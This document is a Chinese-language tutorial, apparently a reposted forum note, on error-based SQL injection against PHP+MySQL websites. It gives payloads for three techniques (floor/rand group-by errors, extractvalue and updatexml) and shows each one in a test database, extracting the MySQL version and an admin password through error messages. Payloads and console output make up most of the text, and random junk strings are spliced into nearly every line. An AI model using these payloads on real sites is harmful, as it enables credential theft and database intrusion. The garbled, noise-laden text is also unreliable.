放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
2 x: M7 S+ j5 m6 P: z实际测试环境:" J2 T; }) C# Z: v; ?* a
+ t8 o4 |5 G4 n. v
# m; H% F) p% P; f/ }mysql> show tables;$ _# \( _! ]" g" ` \: h
+----------------+$ q& a! d H( Y1 E( X1 H n
| Tables_in_test |) Z: F) D! Q) V9 F! W
+----------------+
; d, f4 S4 Y* {7 `| admin |
) s) M% r- B% D2 r: R, B| article |+ w+ t! @. [; U
+----------------+
8 K& }3 T$ R" y/ P' d4 S 2 b% J A) j* W: Y6 T8 i
8 _9 ?& S2 j( S
2 E d" g- R3 e: ^+ Xmysql> describe admin;4 _: r# F6 x3 L6 E, q
+-------+------------------+------+-----+---------+----------------+* t+ f! \5 |3 O+ C
| Field | Type | Null | Key | Default | Extra |2 c+ d; d) ~% E5 \# r
+-------+------------------+------+-----+---------+----------------+- p _8 o' J( ?) P* C
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |7 m; K' l& u0 u+ o+ \
| user | varchar(50) | NO | | NULL | |5 v) a$ h0 y9 t
| pass | varchar(50) | NO | | NULL | |
. i$ } B( x3 s+-------+------------------+------+-----+---------+----------------+9 w+ C3 L& x/ Z$ S6 j) o0 b
+ \8 S# H& n1 ?. d) [$ B
& T6 x: X; q2 T+ h7 [
" ]1 A% l( S( G: Z5 S$ |) Bmysql> describe article;
" b5 t2 v5 R5 [! ~+---------+------------------+------+-----+---------+----------------+& t9 D5 @- a+ I/ ?7 }( p' o, D
| Field | Type | Null | Key | Default | Extra |
- e# M8 W# `% T# _% |+---------+------------------+------+-----+---------+----------------+
9 l. A* x/ N% y. |$ z| id | int(10) unsigned | NO | PRI | NULL | auto_increment |- m, Q7 l4 D# x" d
| title | varchar(50) | NO | | NULL | |+ t' F4 ~' m+ p, g9 D& L8 l
| content | varchar(50) | NO | | NULL | |' K9 T# F2 Z. @4 }! T, A$ C
+---------+------------------+------+-----+---------+----------------+8 t. r( ~; Z# s: ?
1、通过floor报错6 g+ O% H' Q! |0 S! V% ^3 L
可以通过如下一些利用代码
5 P% Q* r5 }5 \9 X # [. n J% q- O4 V# f3 q
+ ?8 D+ B2 {1 j8 ~* `* _
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
0 G2 c9 U" ]6 D9 t% hfrom information_schema.tables group by x)a);- f0 ~& V2 P: l3 w0 Z& v
: A) Y/ m8 y* E5 t; D
/ F8 H: ?- A& Z) i9 B% j
and (select count(*) from (select 1 union select null union select !1)x3 V) Y' V* }/ z% j3 c; h6 F
group by concat((select table_name from information_schema.tables limit 1),
% s* C( N4 G9 pfloor(rand(0)*2)));: c7 H; i- l5 d$ m1 C4 k; \) V) G
举例如下:
2 J) `" I7 z6 b9 B8 r) x" ~首先进行正常查询:
# N" x: J/ P* k 2 |; n, O$ V m+ E4 t3 i' D
mysql> select * from article where id = 1;) W1 O3 i' x" Q. t+ P$ j
+----+-------+---------+
' A, ~0 O; X6 u8 T| id | title | content |& M9 [2 R G1 ?0 }+ D" n$ u( ^
+----+-------+---------+
' a$ A0 E6 q2 T& ]4 @+ ^6 H }. m, d3 g| 1 | test | do it |% q. g8 L0 U. r0 P/ ~
+----+-------+---------+
+ o5 ~, \$ B5 p假如id输入存在注入的话,可以通过如下语句进行报错。9 B' B- s4 l* ^6 V% P K8 U
! [1 j* m1 |. k5 X
9 B. t. K1 H! l$ j( U
mysql> select * from article where id = 1 and (select 1 from
2 y# m1 f' {7 r, o4 B- x(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);! P& t8 H, D v, \* {* H" s1 R% E
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'3 y9 O! U5 E# E* _4 c
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。7 m6 U6 A/ J, _; x0 h( x' C
例如我们需要查询管理员用户名和密码:" r0 O8 B+ |# p1 A6 G
Method1:4 y' j" i4 I: F- j6 H1 W3 Y
! J/ K1 f# }. [) e3 M
7 h1 }. x/ q7 i* D6 n/ l2 D9 {5 Rmysql> select * from article where id = 1 and (select 1 from2 u0 o( d1 V4 t' B
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
" U2 Q; W/ Q1 i5 A- \* Xfrom information_schema.tables group by x)a);
0 C+ `1 ~1 @: N* g i9 CERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'3 G4 A% j, N: f' ]4 j6 g, `
Method2:
0 J/ u8 }. z3 s
& d- p4 y* u1 n& D' Z& M : T& q% M9 p7 L2 P! S
mysql> select * from article where id = 1 and (select count(*)) M1 }: d+ l) }
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1), ]& ~ l! q: j; p
floor(rand(0)*2)));
6 F; i' a! A5 `) uERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
, j; e- \0 s7 f' T2、ExtractValue2 l/ d9 Y* F' C& z2 K2 M" e7 j" c3 j
测试语句如下4 F& _: o# S4 i) j# T
4 } t% m0 v4 V, y; \8 l2 L
% r6 w( a; ?0 U4 b; v. w- ?
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));2 i- _; b+ F! F" {2 r
实际测试过程+ S' h+ e5 g% y" f6 e
' I ~( c3 k' H# ~8 e' X) n
9 ]8 l8 p. x M& V7 I4 Z
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,6 E6 e5 p1 b1 ?% M, a
(select pass from admin limit 1)));--0 N9 U c* {9 ^% ]7 @+ N; ^
ERROR 1105 (HY000): XPATH syntax error: '\admin888'. ~- I4 S8 K& [* v. t- Q
3、UpdateXml
* }' s B+ c! t! A4 W' R测试语句
2 }: F# W" H+ R: o' V# Y$ ]0 I6 Y % H5 `0 Y8 J" Q9 X- r: S6 N3 p
0 {4 [- Z& m& ]' r
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))6 x% R3 y7 J; m! o: u/ y$ Q+ \
实际测试过程' B6 Z& N, h4 l- B( W; B, O7 [
. E3 h3 m/ t6 b( w! \. c) V( i, B2 g 0 X5 F- ~+ W/ `/ _
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,3 P# K; i* p* S, i3 u* x
(select pass from admin limit 1),0x5e24),1));
* a* k0 x! {+ r* q3 RERROR 1105 (HY000): XPATH syntax error: '^$admin888^$') s& }0 E0 Q% ^! P+ k4 @7 l
All, thanks foreign guys.. H% W3 e5 P9 p) E9 z5 V! E3 z e
. }; T$ U5 E3 N' `# z
& l# {) J+ d' w0 W8 k. @ |